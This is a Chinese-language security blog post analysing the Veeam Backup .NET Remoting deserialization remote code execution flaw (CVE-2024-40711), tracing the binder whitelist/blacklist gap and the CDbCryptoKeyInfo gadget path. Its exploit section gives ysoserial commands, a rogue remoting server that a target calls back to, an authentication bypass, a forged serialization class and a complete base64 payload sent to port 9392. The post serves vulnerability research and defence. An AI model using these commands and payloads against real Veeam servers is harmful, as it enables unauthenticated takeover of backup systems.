.Net Remoting 系列三:Veeam Backup RCE (CVE-2024-40711)
本次带来一个相对完整的分析案例
前置知识
https://codewhitesec.blogspot.com/2022/01/dotnet-remoting-revisited.html
https://github.com/codewhitesec/RogueRemotingServer
Remoting代码逻辑分析
按照之前的思路:
- 注册的Channel类型(全局搜ChannelServices#RegisterChannelInternal)
- sinkProviderChains
- TypeFilterLevel
- 注册的objecturi(全局搜RemotingConfiguration#RegisterWellKnownServiceType或RemotingServices#Marshal)
- 处理消息逻辑(
IServerChannelSink#ProcessMessage的实现)
首先定位到Veeam.Common.Remoting.dll文件发现有TransportSink和FormatterSink相关的类,但是并没有自定义的ServerChannel,搜索ChannelServices#RegisterChannelInternal的调用找到注册ServerChannel的地方:
挨个看过去只有CSrvTcpChannelRegistration类注册了一个tcpServerChannel,具体调用代码如下:
private static TcpServerChannel RegisterChannel(Dictionary<string, string> channelProperties, IServerChannelSinkProvider sinkProvider, CConnectionInterceptor connectionInterceptor){TcpServerChannel tcpServerChannel = new TcpServerChannel(channelProperties, sinkProvider, connectionInterceptor);// 开启认证tcpServerChannel.IsSecured = true;ChannelServices.RegisterChannel(tcpServerChannel, true);CSrvTcpChannelRegistration.LogChannelData(tcpServerChannel);return tcpServerChannel;}
注意这里TcpServerChannel传入的有第三个参数CConnectionInterceptor,这里放到后面再说,我们先梳理sinkProviderChains。
继续查找调用寻找sinkProvider定义的地方:
//其构造函数private CSrvTcpChannelRegistration(string commonChannelName, int port, IReadOnlyDictionary<string, string> channelProperties, bool enableRemotingPerfLog, bool requireBasicPermission, [CanBeNull] IActivityMonitor monitor, [CanBeNull] IImpersonationProvider impersonation, [CanBeNull] IAccessCheckProvider accessCheckerProvider, [CanBeNull] IMfaProvider mfaProvider){this._commonChannelName = commonChannelName;this._port = port;//调用GetSinkProvider方法IServerChannelSinkProvider sinkProvider = CSrvTcpChannelRegistration.GetSinkProvider(enableRemotingPerfLog, requireBasicPermission, monitor, impersonation, accessCheckerProvider, mfaProvider);CConnectionInterceptor cconnectionInterceptor = new CConnectionInterceptor();if (Socket.OSSupportsIPv4){TcpServerChannel tcpServerChannel = CSrvTcpChannelRegistration.RegisterChannel(CSrvTcpChannelRegistration.CreateIPv4BindingConfiguration(commonChannelName, channelProperties), sinkProvider, cconnectionInterceptor);this._channelIPv4Name = tcpServerChannel.ChannelName;}......}
跟进GetSinkProvider方法
private static IServerChannelSinkProvider GetSinkProvider(bool enableRemotingPerfLog, bool requireBasicPermission, [CanBeNull] IActivityMonitor monitor, [CanBeNull] IImpersonationProvider impersonation, [CanBeNull] IAccessCheckProvider accessCheckerProvider, [CanBeNull] IMfaProvider mfaProvider){IServerChannelSinkProvider serverChannelSinkProvider = new CBinaryServerFormatterSinkProvider(enableRemotingPerfLog, requireBasicPermission, accessCheckerProvider, mfaProvider);if (monitor != null){serverChannelSinkProvider = new CActivityMonitorServerSinkProvider(monitor, serverChannelSinkProvider);}if (impersonation != null){serverChannelSinkProvider = new CImpersonationServerSinkProvider(impersonation, serverChannelSinkProvider);}return serverChannelSinkProvider;}
这里使用的是CBinaryServerFormatterSink作为FormatterSink,TransportSink使用的默认TcpServerTransportSink,整个服务端的sinkProviderChains:TcpServerTransportSink → CBinaryServerFormatterSink → DispatchChannelSink
同时CBinaryServerFormatterSink中定义了TypeFilterLevel.Low
追溯到启动类发现监听的端口为9392,服务名为Veeam.Backup.Service.exe(tcp://IP:9392/VeeamClientUpdateService )。
最后找到对应的ProcessMessage方法梳理处理消息的逻辑,主要代码如下:
public ServerProcessing ProcessMessage(IServerChannelSinkStack sinkStack, IMessage requestMsg, ITransportHeaders requestHeaders, Stream requestStream, out IMessage responseMsg, out ITransportHeaders responseHeaders, out Stream responseStream){ServerProcessing serverProcessing;using (LogRegistration.RegisterSafe(this._logStorage)){......string text = (string)requestHeaders["Content-Type"];string text2 = (string)requestHeaders["__RequestVerb"];......//部分省略requestMsg = CBinaryServerFormatterSink.DeserializeBinaryRequestMessage(requestStream, requestHeaders);if (requestMsg == null){throw new RemotingException("Remoting Deserialize Error");}IMethodMessage methodMessage = requestMsg as IMethodMessage;if (methodMessage != null){string text3 = requestHeaders["access_token"] as string;Dictionary<string, object> dictionary;EJwtValidationResult ejwtValidationResult = this._mfaProvider.ValidateToken(text3, out dictionary);if (ejwtValidationResult == EJwtValidationResult.Empty || ejwtValidationResult == EJwtValidationResult.Invalid){this.EnsureMfa(requestHeaders);}this.EnsureAccessIsAllowed(methodMessage);}sinkStack.Push(this, null);ServerProcessing serverProcessing2 = this.CallNextSink(sinkStack, requestMsg, requestHeaders, null, out responseMsg, out responseHeaders, out responseStream);if (responseStream != null){throw new RemotingException("Remoting_ChnlSink_WantNullResponseStream");}switch (serverProcessing2){case ServerProcessing.Complete:if (responseMsg == null){throw new RemotingException("Remoting_DispatchMessage");}sinkStack.Pop(this);this.AddSessionToken(requestHeaders, ref responseHeaders);CBinaryServerFormatterSink.SerializeResponse(sinkStack, responseMsg, ref responseHeaders, out responseStream);this.AdditionalyLogResponse(responseMsg);......}}}return serverProcessing;}
调用DeserializeBinaryRequestMessage方法执行反序列化的操作,也是整个过程中最关键的,实现如下
//Veeam.Common.Remoting.CBinaryServerFormatterSink#DeserializeBinaryRequestMessageprivate static IMessage DeserializeBinaryRequestMessage(Stream requestStream, ITransportHeaders requestHeaders){IMessage message;try{message = (IMessage)CBinaryServerFormatterSink.CreateFormatter(false).DeserializeMethodResponse(requestStream, new HeaderHandler(new CBinaryServerFormatterSink.UriHeaderHandler(requestHeaders).HeaderHandler), null);}finally{requestStream.Close();}return message;}//Veeam.Common.Remoting.CBinaryServerFormatterSink#CreateFormatterprivate static BinaryFormatter CreateFormatter(bool serializingResponse){BinaryFormatter binaryFormatter = new BinaryFormatter();binaryFormatter.Binder = new RestrictedSerializationBinder(serializingResponse, RestrictedSerializationBinder.Modes.FilterByWhitelist);binaryFormatter.Context = new StreamingContext(StreamingContextStates.Other);binaryFormatter.FilterLevel = TypeFilterLevel.Low;binaryFormatter.AssemblyFormat = FormatterAssemblyStyle.Full;if (!serializingResponse){binaryFormatter.SurrogateSelector = new CDataSerializationSurogate();}else{ISurrogateSelector surrogateSelector = new RemotingSurrogateSelector();surrogateSelector.ChainSelector(new CDataSerializationSurogate());binaryFormatter.SurrogateSelector = surrogateSelector;}return binaryFormatter;}
这儿有两点需要注意:
- 定义了RestrictedSerializationBinder设置反序列化白名单或黑名单
- 定义了CDataSerializationSurogate作为formatter的序列化或反序列化处理
首先看RestrictedSerializationBinder是如何防御的,关注ResolveType方法和BindToType方法,如果仅仅使用CustomSerializationBinder是可以绕的,数据流:CustomSerializationBinder#BindToType-->RestrictedSerializationBinder#ResolveType-->RestrictedSerializationBinder#EnsureTypeIsAllowed关键代码如下:
// Veeam.Backup.Common.CustomSerializationBinderpublic class CustomSerializationBinder : SerializationBinder{public override Type BindToType(string assemblyName, string typeName){return CustomSerializationBinder.TypeCache.GetOrAdd(new ValueTuple<string, string>(assemblyName, typeName), new Func<ValueTuple<string, string>, Type>(this.ResolveType));}protected virtual Type ResolveType([TupleElementNames(new string[] { "assemblyName", "typeName" })] ValueTuple<string, string> key){return SBinderHelper.ResolveType(key);}// Veeam.Backup.Common.RestrictedSerializationBinderpublic sealed class RestrictedSerializationBinder : CustomSerializationBinder{public RestrictedSerializationBinder(bool serializingResponse, RestrictedSerializationBinder.Modes mode = RestrictedSerializationBinder.Modes.FilterByWhitelist){this._serializingResponse = serializingResponse;this._mode = mode;}......protected override Type ResolveType([TupleElementNames(new string[] { "assemblyName", "typeName" })] ValueTuple<string, string> key){this.EnsureTypeIsAllowed(key);Type type = base.ResolveType(key);RestrictedSerializationBinder.CheckIsRestrictedType(type);return type;}private void EnsureTypeIsAllowed([TupleElementNames(new string[] { "assemblyName", "typeName" })] ValueTuple<string, string> key){if (!this._serializingResponse && SOptions.Instance.ShouldWhitelistingRemoting){this.EnsuredBlackWhitelistsAreLoaded();string text = key.Item2 + ", " + key.Item1;if (this._mode == RestrictedSerializationBinder.Modes.FilterByWhitelist){RestrictedSerializationBinder._allowedTypeFullnames.EnsureIsAllowed(text);return;}if (this._mode == RestrictedSerializationBinder.Modes.FilterByBlacklist){RestrictedSerializationBinder._notAllowedTypeFullnames.EnsureIsAllowed(text);}}}
RestrictedSerializationBinder根据传入的mode参数决定使用白名单或黑名单模式,整个Remoting处理用的是白名单模式,这儿并不是先白名单后黑名单校验,而是二选一于是有了可乘之机。
漏洞分析
一共五处调用最终找到一处调用使用的是黑名单模式
代码如下:
// Veeam.Backup.Core.CProxyBinaryFormatter#Deserializepublic static T Deserialize<T>(string input){T t;try{byte[] array = Convert.FromBase64String(input);BinaryFormatter binaryFormatter = new BinaryFormatter{Binder = new RestrictedSerializationBinder(false, RestrictedSerializationBinder.Modes.FilterByBlacklist)};t = CProxyBinaryFormatter.BinaryDeserializeObject<T>(array, binaryFormatter);}
妥妥的反序列化,老外通过对比补丁新增了一个ObjRef的链,该链子在反序列化的过程中只会反序列化System.Runtime.Remoting.ObjRef和System.Exception,执行命令时不会触发其他黑名单。
可以将Veeam.Backup.Core.CProxyBinaryFormatter#Deserialize作为一个跳板,找到一处调用该方法并处于白名单中的类,就能实现RCE。刚好最后老外从白名单找到一个调用该方法的类
// Veeam.Backup.Model.CDbCryptoKeyInfoprivate readonly List<CRepairRec> _repairRecs = new List<CRepairRec>();protected CDbCryptoKeyInfo(SerializationInfo info, StreamingContext context){this.Id = (Guid)info.GetValue("Id", typeof(Guid));byte[] array = (byte[])info.GetValue("KeySetId", typeof(byte[]));this.KeySetId = new CKeySetId(array);this.KeyType = (EDbCryptoKeyType)((int)info.GetValue("KeyType", typeof(int)));this.EncryptedKeyValue = Convert.FromBase64String(info.GetString("DecryptedKeyValue"));this.Hint = info.GetString("Hint");this.ModificationDateUtc = info.GetDateTime("ModificationDateUtc").SpecifyDateTimeUtc();this.CryptoAlg = (ECryptoAlg)info.GetInt32("CryptoAlg");this._repairRecs = CProxyBinaryFormatter.Deserialize<CRepairRec>((string[])info.GetValue("RepairRecs", typeof(string[]))).ToList<CRepairRec>();this.Version = info.GetInt64("Version");this.BackupId = (Guid)info.GetValue("BackupId", typeof(Guid));this.IsImported = info.GetBoolean("IsImported");}
总结下:
- 无需自定义Channel(TcpServerChannel)
- 开启了认证(CConnectionInterceptor)、low type filter
- 存在一个URI为tcp://IP:9392/VeeamClientUpdateService
- 整个利用链.Net Remoting —> CDbCryptoKeyInfo( 白名单 ) —> CProxyBinaryFormatter.Deserialize ( 黑名单objref )—> RCE
EXP构造
需要用到ExploitRemotingService,有点小改动我编译之后放到这儿了。这儿的改动其实就是绕过其认证的,将用户密码置空就能绕过,CConnectionInterceptor类实际上未处理只是返回true。
然后构造ObjRef
ysoserial.exe -f SoapFormatter -g TextFormattingRunProperties -o raw -c calc > exploit.soapformatterRogueRemotingServer.exe --wrapSoapPayload http://0.0.0.0:2345/aaa exploit.soapformatterysoserial.exe -g ObjRef -f BinaryFormatter -c http://10.106.24.105:2345/aaa// 最终生成AAEAAAD/////AQAAAAAAAAAEAQAAABBTeXN0ZW0uRXhjZXB0aW9uAQAAAAlDbGFzc05hbWUDHlN5c3RlbS5SdW50aW1lLlJlbW90aW5nLk9ialJlZgkCAAAABAIAAAAeU3lzdGVtLlJ1bnRpbWUuUmVtb3RpbmcuT2JqUmVmAQAAAAN1cmwBBgMAAAAdaHR0cDovLzEwLjEwNi4yNC4xMDU6MjM0NS9hYWEL
重定义CDbCryptoKeyInfo序列化过程,传入上面生成的poc序列化:
[Serializable]public class CDbCryptoKeyInfoWrapper : ISerializable{private string[] _fakeList;public CDbCryptoKeyInfoWrapper(string[] _fakeList){this._fakeList = _fakeList;}public void GetObjectData(SerializationInfo info, StreamingContext context){info.SetType(typeof(CDbCryptoKeyInfo));info.AddValue("Id", Guid.NewGuid());info.AddValue("KeySetId", null);info.AddValue("KeyType", 1);info.AddValue("Hint", "aaaaa");info.AddValue("DecryptedKeyValue", "AAAA");info.AddValue("LocaleLCID", 0x409);info.AddValue("ModificationDateUtc", new DateTime());info.AddValue("CryptoAlg", 1);info.AddValue("RepairRecs", _fakeList);}}
传入生成的CDbCryptoKeyInfo序列化数据,再通过ExploitRemotingService发送POC
ExploitRemotingService.exe -s tcp://192.168.45.144:9392/VeeamClientUpdateService raw AAEAAAD/////AQAAAAAAAAAMAgAAAFZWZWVhbS5CYWNrdXAuTW9kZWwsIFZlcnNpb249MTIuMS4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49YmZkNjg0ZGUyMjc2NzgzYQUBAAAAI1ZlZWFtLkJhY2t1cC5Nb2RlbC5DRGJDcnlwdG9LZXlJbmZvCQAAAAJJZAhLZXlTZXRJZAdLZXlUeXBlBEhpbnQRRGVjcnlwdGVkS2V5VmFsdWUKTG9jYWxlTENJRBNNb2RpZmljYXRpb25EYXRlVXRjCUNyeXB0b0FsZwpSZXBhaXJSZWNzAwIAAQEAAAAGC1N5c3RlbS5HdWlkCAgNCAIAAAAE/f///wtTeXN0ZW0uR3VpZAsAAAACX2ECX2ICX2MCX2QCX2UCX2YCX2cCX2gCX2kCX2oCX2sAAAAAAAAAAAAAAAgHBwICAgICAgIC1f56MNPo3kO39y2SXeUREAoBAAAABgQAAAAFYWFhYWEGBQAAAARBQUFBCQQAAAAAAAAAAAAAAQAAAAkGAAAAEQYAAAABAAAABgcAAADkAUFBRUFBQUQvLy8vL0FRQUFBQUFBQUFBRUFRQUFBQkJUZVhOMFpXMHVSWGhqWlhCMGFXOXVBUUFBQUFsRGJHRnpjMDVoYldVREhsTjVjM1JsYlM1U2RXNTBhVzFsTGxKbGJXOTBhVzVuTGs5aWFsSmxaZ2tDQUFBQUJBSUFBQUFlVTNsemRHVnRMbEoxYm5ScGJXVXVVbVZ0YjNScGJtY3VUMkpxVW1WbUFRQUFBQU4xY213QkJnTUFBQUFkYUhSMGNEb3ZMekV3TGpFd05pNHlOQzR4TURVNk1qTTBOUzloWVdFTAs=
总结
当TypeFilterLevel.Low时,可以尝试反序列化其他符合条件的对象进而触发一些恶意方法实现RCE。
参考
https://github.com/codewhitesec/RogueRemotingServer
https://github.com/tyranid/ExploitRemotingService
https://labs.watchtowr.com/veeam-backup-response-rce-with-auth-but-mostly-without-auth-cve-2024-40711-2/
- 发表于 2024-12-25 10:42:01
- 阅读 ( 1744 )
- 分类:WEB安全
g7shot
3 篇文章
